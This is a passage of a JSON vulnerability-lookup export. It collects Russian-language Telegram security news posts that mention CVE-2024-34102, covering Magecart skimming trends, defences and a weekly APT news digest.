Policy (CSP) \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043d\u0435\u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432;\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Subresource Integrity (SRI) \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432;\n\u041f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0439.\n\u0410\u0442\u0430\u043a\u0438 Magecart \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439, \u0438 \u0437\u0430\u0449\u0438\u0442\u0430 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0430.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-01-10T11:40:31.000000Z"}, {"uuid": "d07b0bb3-b1ec-4217-9325-fcb7b3112d53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/itsec_news/5186", "content": "\u200b\u26a1\ufe0f\u0412\u0437\u043b\u043e\u043c \u0441\u043e\u0437\u043d\u0430\u043d\u0438\u044f \u0438 \u0418\u0418: \u043a\u0430\u043a \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438 \u0441\u0442\u0430\u043b\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043a\u043e\u043b\u0435\u043d\u0438\u044f \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u043a\u043e\u0432\n\n\ud83d\udcac \u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043e\u0442\u0447\u0451\u0442\u0443 Payment Fraud Intelligence, \u0432 2024 \u0433\u043e\u0434\u0443 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e\u0435 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0441\u0438\u043b\u044c\u043d\u043e \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043b\u043e. \u041d\u043e\u0432\u044b\u0435 \u0442\u0430\u043a\u0442\u0438\u043a\u0438, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 \u0418\u0418 \u0438 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438, \u0441\u0442\u0430\u043b\u0438 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u0440\u043e\u0441\u0442\u0443 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043e\u0432 \u0443\u0442\u0435\u0447\u0435\u043a \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u0438\u044e \u0447\u0438\u0441\u043b\u0430 \u0430\u0442\u0430\u043a \u043d\u0430 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b. \u0412 \u0434\u0430\u0440\u043a\u043d\u0435\u0442\u0435 \u0438 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u0431\u044b\u043b\u043e \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 269 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u0445 \u043a\u0430\u0440\u0442 \u0438 1,9 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0447\u0435\u043a\u043e\u0432 \u0438\u0437 \u0421\u0428\u0410.\n\n\u0427\u0438\u0441\u043b\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0439 Magecart \u0441\u043a\u0438\u043c\u043c\u0435\u0440\u0430\u043c\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u043b\u043e\u0441\u044c \u0432 3 \u0440\u0430\u0437\u0430 \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 2023 \u0433\u043e\u0434\u043e\u043c, \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0432 11 000 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u043e\u043c\u0435\u043d\u043e\u0432. \u041f\u0440\u0438\u0447\u0438\u043d\u043e\u0439 \u0441\u0442\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CosmicSting ( CVE-2024-34102 , \u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442\u043e\u0432 \u0434\u043b\u044f \u0430\u0442\u0430\u043a, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Sniffer by Fleras. \u042d\u0442\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u043f\u043e\u0445\u0438\u0449\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438. \u0417\u0430 \u0433\u043e\u0434 \u0431\u044b\u043b\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043e\u043a\u043e\u043b\u043e 1200 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432 \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u0438 \u0438 \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435. \u041f\u043b\u043e\u0449\u0430\u0434\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u0438 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u043f\u0440\u043e\u0434\u0430\u0432\u0446\u043e\u0432 \u0434\u043b\u044f \u043e\u0431\u043c\u0430\u043d\u0430 \u043f\u043e\u043a\u0443\u043f\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043c\u043e\u043d\u0435\u0442\u0438\u0437\u0430\u0446\u0438\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u0414\u0430\u0440\u043a\u043d\u0435\u0442-\u043c\u0430\u0440\u043a\u0435\u0442\u044b \u043e\u0441\u0442\u0430\u043b\u0438\u0441\u044c \u0446\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u043e\u0439 \u0434\u043b\u044f \u043f\u0440\u043e\u0434\u0430\u0436\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f \u0434\u043b\u044f \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u0430. Telegram, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0439, \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043b \u0441\u0432\u043e\u044e \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0445\u0430\u043a\u0435\u0440\u0430\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0447\u0435\u043a\u0438. \u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u043e\u0441\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0432 Telegram.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u0430 \u0441 \u0447\u0435\u043a\u0430\u043c\u0438 \u0432 \u0421\u0428\u0410 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439: \u0431\u043e\u043b\u0435\u0435 1,9 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0447\u0435\u043a\u043e\u0432 \u0431\u044b\u043b\u043e \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043e \u0432 \u0434\u0430\u0440\u043a\u043d\u0435\u0442\u0435 \u0438 \u0432 Telegram. \u0413\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0439 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0432\u0441\u044e \u0441\u0442\u0440\u0430\u043d\u0443, \u0441 \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u043a\u043e\u043d\u0446\u0435\u043d\u0442\u0440\u0430\u0446\u0438\u0435\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u0437\u043e\u043d\u0430\u0445.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u0440\u043e\u0441\u0442 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u043a\u0438\u043c\u043c\u0435\u0440\u043e\u0432 \u0438 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043d\u0430 \u0444\u043e\u043d\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u043e\u0432. \u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 OTP-\u043a\u043e\u0434\u043e\u0432 \u0441\u0442\u0430\u043d\u0435\u0442 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0433\u043b\u0430\u0432\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0414\u0430\u0440\u043a\u043d\u0435\u0442-\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442 \u0441\u0432\u043e\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0443\u0441\u0438\u043b\u0438\u044f \u043f\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u043e\u0432, \u0430 \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u044b\u0442\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0447\u043d\u0443\u0442 \u0434\u043e\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 Telegram.\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0443\u0433\u0440\u043e\u0437\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u0448\u0430\u0433\u043e\u0432:\n\n\u0412\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u0438 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u0430\u0445 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438;\n\u0423\u0441\u0438\u043b\u0435\u043d\u0438\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0439 \u043a \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0435 \u043d\u043e\u0432\u044b\u0445 \u043f\u0440\u043e\u0434\u0430\u0432\u0446\u043e\u0432;\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0443\u0440\u043e\u0432\u043d\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u0440\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0438 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u043e\u0432;\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 Recorded Future \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u0438\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0439;\n\u041f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u043d\u0442\u0438\u0444\u0440\u043e\u0434-\u043c\u0435\u0440 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u0420\u0430\u0437\u0432\u0438\u0442\u0438\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0434\u0435\u043b\u0430\u0435\u0442 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u0441\u0451 \u0431\u043e\u043b\u0435\u0435 \u0438\u0437\u043e\u0449\u0440\u0451\u043d\u043d\u044b\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u044b\u043c \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c \u0438 \u0442\u043e\u0440\u0433\u043e\u0432\u044b\u043c \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0430\u043c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043f\u0440\u043e\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0443\u043a\u0440\u0435\u043f\u043b\u044f\u0442\u044c \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u043c\u0435\u0436\u0434\u0443 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u043c\u0438 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u0430.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-01-24T09:43:55.000000Z"}, {"uuid": "7b9e61f9-8cf1-4ab8-8570-38cfe2fd5f95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/kasperskyb2b/1441", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd2f \u041e\u0431\u044b\u0447\u043d\u043e \u043c\u044b \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u043c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 APT \u0431\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u043e \u0442\u0443\u0442 \u0443\u0436 \u0431\u043e\u043b\u044c\u043d\u043e \u0443\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u044e\u0436\u0435\u0442. WSJ \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0430\u0442\u0430\u043a APT Salt Typhoon \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0435\u0432, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445 AT&T, Verizon \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u043a\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 (\u0430\u043d\u0430\u043b\u043e\u0433 \u0421\u041e\u0420\u041c). \u042d\u0442\u043e \u2014 \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0434\u043d\u043e\u0433\u043e, \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0435\u0445.\n\n\ud83d\udc7d SIEM \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u043b\u043e\u0434\u0435\u0435\u0432: \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043b\u0438\u0435\u043d\u0442 open source SIEM Wazuh. \u041a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\ud83d\ude2e Cloudflare \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u0441 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u0439 DDoS-\u0430\u0442\u0430\u043a\u043e\u0439 \u0430\u0436 \u043d\u0430 3,8 \u0422\u0431/\u0441.\n\n\ud83d\udc7e \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044e\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u043c\u0438 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430\u0439\u0434\u0435\u043d\u043e \u0432 \u0421\u0428\u0410, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0428\u0432\u0435\u0446\u0438\u0438, \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u2014 Asus \u0438 Qnap. \u041d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0412\u041f\u041e GobRAT \u0438 Bulbature. \n\n\u0410 \u0412\u041f\u041e perfctl \u0443\u0436\u0435 \u0442\u0440\u0438 \u0433\u043e\u0434\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e 